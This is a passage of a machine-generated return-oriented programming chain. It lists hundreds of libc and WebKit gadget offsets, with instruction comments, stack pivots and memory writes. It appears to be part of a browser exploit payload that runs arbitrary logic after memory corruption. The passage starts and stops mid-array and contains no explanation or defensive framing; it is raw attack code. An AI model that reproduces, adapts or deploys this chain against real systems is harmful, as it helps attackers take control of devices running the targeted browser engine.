//movsxd rax, edi libc_base+764760, //pop rsi ropchain+384592, //L7987 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+384624, //L7989 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+384608, //L7988 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7987: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7988: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7989: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al 
libc_base+764760, //pop rsi ropchain+384792, //L7991 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+384808, //L7992 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+384776, //L7990 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7990: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7991: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7992: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+384920, //L7994 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+384968, //L7997 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+384936, //L7995 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7994: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7995: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7996: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7997: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+385080, //L7998+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+385072, //L7998 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L7998: db([0, 0]); // 0x0 set_gadgets([ ropchain+385096, //L7998+24 ropchain+386568, //L7993 libc_base+764760, //pop rsi ropchain+385136, //L7999 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7999: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi //L8001: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+385256, //L8004 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+385240, //L8002 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8002: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8004: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+385432, //L8007 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+385448, //L8008 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+385400, //L8005 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+385416, //L8006 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8005: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8006: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8007: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8008: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+385544, //L8010 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+385528, //L8009 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8009: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8010: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L8011: db([1, 0]); // 0x1 
set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L8012: db([6, 0]); // 0x6 set_gadget(libc_base+763368,); //pop rcx //L8013: db([6, 0]); // 0x6 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+385744, //L8015 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8015: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+385800, //L8016 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8016: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+385936, //L8020 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+385920, //L8019 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8018: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L8019: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8020: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+386000, //L8021 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8021: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8023: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx 
libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L8025: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+386160, //L8028 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+386144, //L8026 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8026: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8028: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+386304, //L8031 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+386272, //L8029 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+386288, //L8030 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8029: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8030: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8031: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+386392, //L8033 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L8032: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L8033: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+386448, //L8034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8034: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8036: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+386528, //L8038 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8038: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L7993: libc_base+782311, //pop rsp ropchain+393104, //L7904 //L7708: libc_base+764760, //pop rsi ropchain+386624, //L8039 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8039: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8041: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+386744, //L8044 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+386728, //L8042 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8042: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8044: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+386920, //L8047 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+386936, //L8048 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+386888, //L8045 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+386904, //L8046 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8045: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8046: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8047: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8048: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, 
edi libc_base+764760, //pop rsi ropchain+387032, //L8050 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+387016, //L8049 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8049: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8050: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L8051: db([8, 0]); // 0x8 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L8052: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L8053: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+387312, //L8055 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+387328, //L8056 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+387296, //L8054 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8054: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8055: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8056: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+387440, //L8058 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+387488, //L8061 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+387456, //L8059 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8058: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8059: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8060: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8061: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+387600, //L8062+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+387592, //L8062 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L8062: db([0, 0]); // 0x0 set_gadgets([ ropchain+387616, //L8062+24 ropchain+387752, //L8057 libc_base+759608 //pop rax ]); //L8063: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L8064: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L8065: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+782311, //pop rsp ropchain+387872, //L8066 //L8057: libc_base+759608 //pop rax ]); //L8067: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L8068: db([9, 0]); // 0x9 set_gadget(libc_base+763368,); //pop rcx //L8069: db([9, 0]); // 0x9 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); 
// -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl //L8066: libc_base+764760, //pop rsi ropchain+387912, //L8071 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8071: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+387968, //L8072 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8072: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+388104, //L8076 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+388088, //L8075 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8074: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L8075: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8076: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+388168, //L8077 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8077: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8079: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L8081: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+388328, //L8084 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+388312, //L8082 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, 
//mov rax, rcx libc_base+763368 //pop rcx ]); //L8082: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8084: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+388472, //L8087 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+388440, //L8085 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+388456, //L8086 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8085: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8086: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8087: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+388560, //L8089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L8088: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L8089: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+388616, //L8090 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8090: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8092: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+388696, //L8094 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8094: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+393104, //L7904 //L7738: libc_base+764760, 
//pop rsi ropchain+388792, //L8095 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8095: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8097: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+388912, //L8100 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+388896, //L8098 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8098: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8100: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+389088, //L8103 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+389104, //L8104 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+389056, //L8101 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+389072, //L8102 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8101: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8102: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8103: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8104: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+389200, //L8106 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+389184, //L8105 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8105: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8106: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi 
db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L8107: db([8, 0]); // 0x8 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L8108: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L8109: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+389480, //L8111 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+389496, //L8112 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+389464, //L8110 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8110: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8111: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8112: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+389608, //L8114 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+389656, //L8117 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+389624, //L8115 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8114: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8115: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8116: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8117: db([0, 0]); // 0x0 
set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+389768, //L8118+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+389760, //L8118 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L8118: db([0, 0]); // 0x0 set_gadgets([ ropchain+389784, //L8118+24 ropchain+389920, //L8113 libc_base+759608 //pop rax ]); //L8119: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L8120: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L8121: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+782311, //pop rsp ropchain+390040, //L8122 //L8113: libc_base+759608 //pop rax ]); //L8123: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L8124: db([9, 0]); // 0x9 set_gadget(libc_base+763368,); //pop rcx //L8125: db([9, 0]); // 0x9 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl //L8122: libc_base+764760, //pop rsi ropchain+390080, //L8127 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8127: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+390136, //L8128 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8128: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+390272, //L8132 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+390256, //L8131 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8130: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L8131: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8132: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+390336, //L8133 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8133: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8135: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L8137: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+390496, //L8140 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+390480, //L8138 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8138: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8140: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+390640, //L8143 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+390608, //L8141 webkit_base+660161, //mov 
